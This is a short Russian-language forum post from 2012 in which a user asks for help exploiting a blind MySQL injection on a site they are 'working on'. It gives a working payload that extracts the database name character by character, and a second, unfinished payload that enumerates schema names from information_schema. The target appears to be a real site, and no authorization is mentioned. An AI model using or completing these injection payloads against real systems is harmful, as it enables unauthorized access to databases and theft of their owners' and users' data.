22.06.2012, 22:16
|
|
Познающий
Регистрация: 02.06.2012
Сообщений: 33
С нами:
7339286
Репутация:
0
|
|
Собственно нид хелп...
Кручу один сайтец.
Собственно там mysql blind
Вот такими запросами вытащил имя базы/имя юзверя.
3183' /*!30000and ascii(substring((database()),7,1))=97 and*/ 'x'='x
А теперь вопрос:
3183' /*!30000and Length((select distinct schema_name from `information_schema`.schemata limit 0,1))
|
|
|